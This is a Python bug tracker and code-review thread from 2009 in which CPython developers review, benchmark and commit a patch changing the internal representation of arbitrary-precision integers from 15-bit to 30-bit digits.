PyLong_FromLongLong would make sense. If this is not available, we still need to make sure that CHECK_SMALL_INT gets called. File PC/pyconfig.h (right): Line 318: #define PY_UINT64_T unsigned __int64 On 2009/02/17 22:39:18, Martin v. Löwis wrote: > I think this should use PY_LONG_LONG, to support MingW32; likewise, __int32 > shouldn't be used, as it is MSC specific Ok. I'll use PY_LONG_LONG for 64-bit, and try int and long for 32-bit. File Python/marshal.c (right): Line 160: w_long((long)(Py_SIZE(ob) > 0 ? l : -l), p); On 2009/02/17 22:39:18, Martin v. Löwis wrote: > This needs to deal with overflow (sizeof(size_t) > sizeof(long)) Hmm. It looks as though there are many places in this file, particularly in w_object, that do "w_long((long)n, p), where n has type Py_ssize_t. Presumably all of these should be fixed. Line 540: if (n < -INT_MAX || n > INT_MAX) On 2009/02/17 22:39:18, Martin v. Löwis wrote: > I think this is obsolete now; longs can have up to ssize_t_max digits. Agreed. Again, this needs to be fixed throughout marshal.c (many occurrences in r_object). File configure.in (right): Line 3132: # determine what size digit to use for Python's longs On 2009/02/17 22:39:18, Martin v. Löwis wrote: > I'm skeptical (-0) that we really need to have such a configure option. I think it's potentially useful to be able to do --disable-big-digits on platforms where the compiler isn't smart enough to translate a 32-bit by 32-bit multiply into the appropriate CPU instruction, so that using 30-bit digits might hurt performance. I've also found it handy during debugging and testing. But I guess I'm only +0.5 on the configure option; if others think that it's just unnecessary clutter then I'll remove it. File pyconfig.h.in (left): Line 9: #undef AC_APPLE_UNIVERSAL_BUILD On 2009/02/17 22:39:18, Martin v. Löwis wrote: > We should find out why this is gone. Looks like an autoconf 2.63/autoconf 2.61 difference. Whoever previously ran autoconf and autoheader used 2.63; I used 2.61. (Which explains the huge configure diff as well.) Description: This patchset makes it possible for Python to use base 2**30 instead of base 2**15 for its internal representation of arbitrary-precision integers. The aim is both to improve performance of integer arithmetic, and to make possible some additional optimizations (not currently included in this patchset). The patchset includes: - a new configure option --enable-big-digits - a new structseq sys.int_info giving information about the internal representation See for the related tracker discussion. Please review this at Affected files: M Doc/library/sys.rst M Include/longintrepr.h M Include/longobject.h M Include/pyport.h M Lib/test/test_long.py M Lib/test/test_sys.py M Objects/longobject.c M PC/pyconfig.h M Python/marshal.c M Python/sysmodule.c M configure M configure.in M pyconfig.h.in Le mercredi 18 février 2009 à 17:06 +0000, Mark Dickinson a écrit : > Looks like an autoconf 2.63/autoconf 2.61 difference. > Whoever previously ran autoconf and autoheader used 2.63; Sorry, that was me. autoconf seems unable to maintain reasonably similar output between two different versions.... Gregory, are you sure you didn't swap the 30-bit and 30-bit+opt results? On OS X/Core 2 Duo my timings are the other way around: 30bit is significantly slower than unpatched, 30bit+opt is a little faster than unpatched. Here are sample numbers: Macintosh-3:py3k-30bit-opt dickinsm$ ./python.exe ../pidigits_noprint.py Time; 2181.3 ms Macintosh-3:py3k-30bit dickinsm$ ./python.exe ../pidigits_noprint.py 2000 Time; 2987.9 ms Macintosh-3:py3k dickinsm$ ./python.exe ../pidigits_noprint.py 2000 Time; 2216.2 ms And here are results from 64-bit builds on the same machine as above (OS X 10.5.6/Core 2 Duo, gcc 4.0.1 from Apple). ./python.exe ../pidigits_noprint.py 2000 gives the following timings: 30-bit digits: Time; 1245.9 ms 30-bit digits + optimizations: Time; 1184.4 ms unpatched py3k: Time; 2479.9 ms hmm yes, ignore my 13+optimize result. apparently that used 15bit digits despite --enable-big-digits on configure. attempting to fix that now and rerun. > apparently that used 15bit > digits despite --enable-big-digits on configure. On all other follow-ups I agree, so no further comments there. File Python/marshal.c (right): Line 160: w_long((long)(Py_SIZE(ob) > 0 ? l : -l), p); > Presumably all of these should be fixed. Ok, so I'd waive this for this patch; please do create a separate >. I think the docs say to run autoheader first, then autoconf. >. Perhaps by doing "autoreconf" instead? new results after fixing my longdigit13 build to use 30 bits instead of 15 (the configure script in longdigit13+optimizations didn't work right, i had to manually add the #define to pyconfig.h) py3k: baseline longdigit14 longdigit13+optimizations 3709 ms 3664 ms 3377 ms thats much saner. attaching an updated pidigits benchmark script that does a warmup run before reporting the best result of 5. Here are the results from 32-bit x86 on core2 duo gcc 4.0.1 using pydigits_bestof.py 4000: 30-bit digits (14): 15719 ms 30-bit digits + optimizations (13+ops): 12490 ms unpatched py3k : 13289 ms (again, i had to manually add #define PYLONG_DIGIT_SIZE 30 to pyconfig.h for the longdigit13+optimizations patch). and pybench runs on the same builds vs unpatched: 30-bit digits (14): -1.4% (slightly slower) 30-bit digits + optimizations (13+ops): -0.2% (insignificant) My votes: Obviously use the optimized version (but fix the configure stuff). +0 for enabling it by default on 32bit builds. +10 for enabling it by default on 64bit builds. > Obviously use the optimized version (but fix the configure stuff). Before such a version gets committed, I'd like to see it on Rietveld again. The attached patch uses mul1 in long_mul in the version patched with 30bit_longdigit13+optimizations.patch Comparison between these two patches on hp pavilion Q8200 2.33GHz pybench patch new patch SimpleIntegerArithmetic 89 85 other tests equal pidigits_noprint 2000 998 947 > Before such a version gets committed, I'd like to see it on Rietveld > again. Sure. My original plan was to get the structural changes in first, and then worry about optimizations. But now I think the x_divrem fix has to be considered a prerequisite for the 30-bit digits patch. So I'll clean up the x_divrem code, include it in the basic patch and upload to Rietveld. The other optimization (to multiplication) is more optional, potentially more controversial (it adds 60 or so lines of extra code), and should wait until after the commit and get a separate issue and review. The x_divrem work actually simplifies the code (whilst not altering the underlying algorithm), as well as speeding it up. Still, it's changing a subtle core algorithm, so we need to be *very* sure that the new code's correct before it goes in. In particular, I want to add some tests to test_long that exercise the rare corner cases in the algorithm (which only become rarer when 30-bit digits are used). I also want to understand Gregory's problems with configure before committing anything. None of this is going to happen before the weekend, I'm afraid. File Python/marshal.c (right): Line 160: w_long((long)(Py_SIZE(ob) > 0 ? l : -l), p); On 2009/02/18 21:27:04, Martin v. Löwis wrote: > Ok, so I'd waive this for this patch; please do create a separate Done. Here's an updated patch that includes the x_divrem fixes and optimizations. I've also updated the Rietveld issue with these fixes. I think this is (modulo any requested changes) the version that I'd like to get into py3k. After that we can look at the possibility of optimizing the multiplication algorithm; the discussion for this should probably go back to issue 3944. Here's a detailed list of the changes to x_divrem. 0. Most importantly, in the inner loop, we make sure that the multiplication is digit x digit -> twodigits; previously it was digit x twodigits -> twodigits, which is likely to expand to several instructions on a 32-bit machine. I suspect that this is the main cause of the slowdown that Victor was seeing. 1. Make all variables unsigned. This eliminates the need for Py_ARITHMETIC_RIGHT_SHIFT, and also removes the only essential use of stwodigits in the entire long object implementation. 2. Save an iteration of the outer loop when possible by comparing top digits. 3. Remove double tests in the main inner loop and correction loop. 4. Quotient digit correction step follows Knuth more closely, and uses fewer operations. The extra exit condition (r >= PyLong_BASE) will be true more than 50% of the time, and should be cheaper than the main test. 5. In quotient digit estimation step, remove unnecessary special case when vj == w->ob_digits[w_size-1]. Knuth only needs this special case because his base is the same as the wordsize. 6. There's no need to fill the eliminated digits of v with zero; instead, set Py_SIZE(v) at the end of the outer loop. 7. More comments; some extra asserts. There are many other optimizations possible; I've tried only to include those that don't significantly complicate the code. An obvious remaining inefficiency is that on every iteration of the outer loop we divide by the top word of w; on many machines I suspect that it would be more efficient to precompute an inverse and multiply by that instead. Updated benchmarks results with 30bit_longdigit17.patch: * Victor's bench_int.py: - 32-bit with patch: 1178.3 ms (24% speedup) - 64-bit with patch: 990.8 ms (27% speedup) * Calculating 2000 digits of pi: - 32-bit with patch: 2.16 s. (25% speedup) - 64-bit with patch: 1.5 s. (55% speedup) This is very good work. Adding Tim Peters to the nosy list, mainly to give him an opportunity to throw up his hands in horror at my rewrite of his (I'm guessing) implementation of division. It finally occurred to me that what might be killing 32-bit performance is the divisions, rather than the multiplications. To test this, here's a version of 30bit_longdigit17.patch that replaces just *two* of the divisions in Objects/longsobject.c by the appropriate x86 divl assembler instruction. The result for pydigits is an astonishing 10% speedup! Results of running python pydigits_bestof.py 2000 on 32-bit OS X 10.5.6/Core 2 Duo: upatched py3k ------------- Best Time; 2212.6 ms 30bit_longdigit17.patch ----------------------- Best Time; 2283.9 ms (-3.1% relative to py3k) 30bit_longdigit17+asm.patch --------------------------- Best Time; 2085.7 ms (+6.1% relative to py3k) The problem is that (e.g., in the main loop of x_divrem) we're doing a 64-bit by 32-bit division, expecting a 32-bit quotient and a 32-bit remainder. From the analysis of the algorithm, *we* know that the quotient will always fit into 32 bits, so that e.g., on x86, a divl instruction is appropriate. But unless the compiler is extraordinarily clever it doesn't know this, so it produces an expensive library call to a function that probably involves multiple divisions and/or some branches, that produces the full 64-bit quotient. On 32-bit PowerPC things are even worse, since there there isn't even a 64-by-32 bit divide instruction; only a 32-bit by 32-bit division. So I could still be persuaded that 30-bit digits should only be enabled by default on 64-bit machines... Okay, let's abandon 30-bit digits on 32-bit machines: it's still unclear whether there's any real performance gain, and it's trivial to re-enable 30-bit digits by default later. I'm also going to abandon the optimizations for now; it'll be much easier to work on them once the base patch is in. Here's a 'release-candidate' version of the patch: it's exactly the same as before, except: - I removed all x_divrem changes (though I've left the extra division tests in, since they're just as relevant to the old x_divrem). I'll open a separate issue for these optimizations. - enable 30-bit digits by default only on 64-bit platforms, where for the purposes of this patch a 64-bit platform is one with all the necessary integer types available (signed and unsigned 32- and 64-bit integer types) and SIZEOF_VOID_P >= 8. I've also updated the version uploaded to Rietveld: the patchset there should exactly match 30bit_longdigit20.patch. See: Martin, thank you for all your help with reviewing the previous patch. Is it okay with you to check this version in? It's the same as the version that you reviewed, except with some extra tests for correct division, and with 30-bit digits disabled by default on 32-bit platforms. Gregory, if you have time, please could you double check that the configure stuff is working okay for you with this patch? "configure -- enable-big-digits" should produce 30-bit digits; "configure --disable- big-digits" should produce 15-bit digits, and a plain "configure" should give 15-bit or 30-bit depending on your platform. Anyone else have any objections to this going in exactly as it is? I'd quite like to resolve this issue one way or the other and move on. 1 comment and 1 question about 30bit_longdigit20.patch: -. - In pyport.h, you redefine PYLONG_BITS_IN_DIGIT if it's not set. Is it for the Windows world (which doesn't use configure script)? I prefer the patch version 20 because it's much simplier than the other with the algorithm optimisations. The patch is already huge, so it's better to split it into smaller parts ;-) [Victor] > In pyport.h, you redefine PYLONG_BITS_IN_DIGIT if it's not set. Is > it for the Windows world (which doesn't use configure script)? Yes, but it's also for Unix: PYLONG_BITS_IN_DIGIT is only set when the -- enable-big-digits option is supplied to configure. So the code in pyport.h always gets used for a plain ./configure && make. >. I agree with you to some extent, but I'd still prefer to leave the 15-bit definitions as they are, partly out of a desire not to make unnecessary changes. The 'unsigned short' type used for 15-bit digits is both theoretically sufficient and not wasteful in practice. Barring further objections, I'm planning to get the 30bit_longdigit20.patch in later this week. I tried the patch on a 64-bit Linux system and it's ok. Committed 30bit_longdigit20.patch to py3k in r70460, with some minor variations (incorporate Nick Coghlan's improved error messages for marshal, fix some comment typos, add whatsnew and Misc/NEWS entries). Thanks all for your feedback. I might get around to backporting this to 2.7 one day... That should be r70459, of course. Great! > Committed 30bit_longdigit20.patch to py3k in r70460, with some minor > variations (incorporate Nick Coghlan's improved error messages > for marshal, fix some comment typos, add whatsnew and Misc/NEWS entries). Backported to trunk in r70479. Mario, thanks for the long multiplication tweaks you submitted: could you possibly regenerate your Feb 19th patch against the trunk (or py3k, whichever you prefer) and attach it to issue 3944?
http://bugs.python.org/issue4258
CC-MAIN-2017-09
refinedweb
7,017
75.81
Here you can see example for different ways of initializing string. You can create and initialize string object by calling its constructor, and pass the value of the string. Also you can pass character array to the string constructor. You can also directly assign string value to the string reference, which is equals to creating string object by calling constructor. The empty string constructor will create string object with empty value. package com.myjava.string; public class MyStringInitialization { public static void main(String a[]){ String abc = "This is a string object"; String bcd = new String("this is also string object"); char[] c = {'a','b','c','d'}; String cdf = new String(c); String junk = abc+" This is another String].
http://java2novice.com/java_string_examples/initialization_sample_code/
CC-MAIN-2020-40
refinedweb
118
61.36
Full Text Search: The Key to Better Natural Language Queries for NoSQL in Node.js Watch→ What is wrong with this code snippet? #include <string> #include <list> using std::string; using std::list; class Node {/*..*/}; int main() { list <node&> ln; //error } If you try to compile this example, your compiler will issue numerous compilation errors. The problem is that list<T> has member functions that take or return T&. In other words, the compiler transforms <node&> to <node&&>. Because a reference to a reference is illegal in C++, the program is ill-formed. As a rule, you should instantiate templates in the form of list<node> and never as list <node&>. Please enable Javascript in your browser, before you post the comment! Now Javascript is disabled. Your name/nickname Your email WebSite Subject (Maximum characters: 1200). You have 1200 characters left.
http://www.devx.com/tips/Tip/13219
CC-MAIN-2018-13
refinedweb
141
68.57
Use a third-party library: react-data-grid (react-data-grid) via npm and use it within a custom Experience Builder widget. How to use the sample Clone the sample repo and copy this widget's folder (within samples/widgets) to the client/your-extensions/widgets folder of your Experience Builder installation. How it works The react-data-grid library was installed via npm - see the reference to it in the package.json file. After downloading the sample, in a terminal browse to the root of the widget directory and run npm install. This will look at the package.json file and install react-data-grid since it's listed there. Now that the files are in place, the widget can refer to the library using it's npm package name - see in widget.tsx the import line: import * as ReactDataGrid from "react-data-grid"; This method of installing a third-party library, via npm, should be used if this library is planned on only being used by a single widget. See the Using Third-Party Libraries guide topic for information about how to use this pattern and other ways to use third-party libraries.
https://developers.arcgis.com/experience-builder/sample-code/widgets/react-data-grid/
CC-MAIN-2021-04
refinedweb
195
52.19
Hey guys, I'm new to python so if this is a silly question, pardon me. I have the following basic assignment: Take a user-specified range of lines from some data file, call it input, and write them to an output data file. What I want to do is have the user specify the range (for example lines 10-20) that will be picked from the input file to the output file. I am trying to use readlines() and I am able to get the program to pick a certain number of lines, but it always begins as line 1. For example, if I specify lines (30-200) it will recognize that it must extract 170 lines from the input file; however, it starts at line 1 and runs to line 170 instead of starting at line 30. Here is a snipet of the code: first = int(raw_input('Enter a starting value')) last = int(raw_input('Enter a final value')) def add_line_numbers(infile, outfile): f = open(infile,'r') o = open(outfile,'w') i = 1 for i in range(first, last): o.write(str(i)+'\t'+f.readline()) f.close() o.close() --- Parsing code follows The code originally worked fine until I began editing it. The original code takes an entire input file and transfers it to an entire output file. So only my edits are in question. The 'i' acts as a counter, and that part works fine. The counter will read 30-200 for example; however, the lines that are inputing are still 1-170 from the original data type. As I said, I am new to python and very amenable to suggestions so if you have a smarter way to tackled this problem, I am all ears. This has been a very frustrating process. I'd appreciate help so much.
https://www.daniweb.com/programming/software-development/threads/193030/is-there-a-clever-way-to-do-this
CC-MAIN-2017-51
refinedweb
302
68.3